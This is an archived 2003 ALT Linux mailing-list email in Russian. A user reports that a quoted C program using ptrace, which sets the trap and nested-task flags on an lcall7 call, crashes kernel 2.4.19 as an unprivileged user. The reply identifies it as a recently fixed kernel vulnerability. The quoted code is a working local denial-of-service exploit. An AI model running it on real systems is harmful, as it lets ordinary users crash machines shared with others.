From mboxrd@z Thu Jan  1 00:00:00 1970
Return-Path: <llb@udm.ru>
Date: Fri, 10 Jan 2003 08:14:20 +0400
From: ASA <llb@udm.ru>
X-Mailer: The Bat! (v1.60q)
Organization: LLB, LLC
X-Priority: 3 (Normal)
Message-ID: <1532118766.20030110081420@udm.ru>
To: =?koi8-r?B?8NXby8nOIPPF0sfFyiDhzMXL08XF18ne?= <community@altlinux.ru>
Cc: Konstantin Volckov <goldhead@altlinux.ru>
In-Reply-To: <auto-000051228161@intranet.ru>
References: <auto-000051228161@intranet.ru>
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Subject: [Comm] =?koi8-r?B?UmU6IFtDb21tXSBrZXJuZWwgcGFuaWMgydot2sEgzcEtwS3BLcHMxc7Yy8/K?=
 =?koi8-r?B?INDSz8fSwc3Ny8k=?=
Sender: community-admin@altlinux.ru
Errors-To: community-admin@altlinux.ru
X-BeenThere: community@altlinux.ru
X-Mailman-Version: 2.0.9
Precedence: bulk
Reply-To: community@altlinux.ru
X-Reply-To: ASA <llb@udm.ru>
List-Unsubscribe: <http://www.altlinux.ru/mailman/listinfo/community>,
	<mailto:community-request@altlinux.ru?subject=unsubscribe>
List-Id: <community.altlinux.ru>
List-Post: <mailto:community@altlinux.ru>
List-Help: <mailto:community-request@altlinux.ru?subject=help>
List-Subscribe: <http://www.altlinux.ru/mailman/listinfo/community>,
	<mailto:community-request@altlinux.ru?subject=subscribe>
List-Archive: <http://www.altlinux.ru/pipermail/community/>
Archived-At: <http://lore.altlinux.org/community/1532118766.20030110081420@udm.ru/>
List-Archive: <http://lore.altlinux.org/community/>
List-Post: <mailto:mandrake-russian@linuxteam.iplabs.ru>

Hello Пушкин,

Friday, January 10, 2003, 7:19:12 AM, you wrote:

ПСА> Приветсвую, всезнающий All

ПСА> Вниманию ядерщиков (или ядрёнщиков :)) )

ПСА> Есть такая программка:

ПСА> //-------------------------------------------------------------
ПСА> #include <sys/ptrace.h>

ПСА> struct user_regs_struct
ПСА> {
ПСА>    long ebx, ecx, edx, esi, edi, ebp, eax;
ПСА>    unsigned short ds, __ds, es, __es;
ПСА>    unsigned short fs, __fs, gs, __gs;
ПСА>    long orig_eax, eip;
ПСА>    unsigned short cs, __cs;
ПСА>    long eflags, esp;
ПСА>    unsigned short ss, __ss;
ПСА> };
ПСА> int
ПСА> main (void)
ПСА> {
ПСА>    int pid;
ПСА>    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
ПСА>    void (*lcall7) (void) = (void *) dos;
ПСА>    struct user_regs_struct d;
ПСА> if (!(pid = fork ()))
ПСА> {
ПСА>    usleep (1000);
ПСА>    (*lcall7) ();
ПСА> }
ПСА>      else
ПСА>      {
ПСА>        ptrace (PTRACE_ATTACH, pid, 0, 0);
ПСА>    while (1)
ПСА>        {
ПСА>            wait (0);
ПСА>            ptrace (PTRACE_GETREGS, pid, 0, &d);
ПСА>        d.eflags |= 0x4100;    /* set TF and NT */
ПСА>        ptrace (PTRACE_SETREGS, pid, 0, &d);
ПСА>        ptrace (PTRACE_SYSCALL, pid, 0, 0);
ПСА>        }
ПСА>      }
ПСА> return 1;
ПСА> }
ПСА> //--------------------------------------------------------------

ПСА> Компилируется и запускается.
ПСА> В результате стабильный kernel panic даже от простого юзера
ПСА> (честно говоря под рутом и не пробовал)

ПСА> Сизиф от 25 декабря минувшего года
ПСА> rpm -qa | grep kernel
ПСА> kernel24-up-2.4.19-alt0.8
ПСА> NVIDIA_kernel-up-2.4.19_1.0.3123-alt0.8

ПСА> К чему бы это?
К тому, что это уязвимость ядра была найдена совсем недавно и
быстро была починена. Надеюсь, что Константин уже знает о ней.

-- 
Best regards,
 ASA                            mailto:llb@udm.ru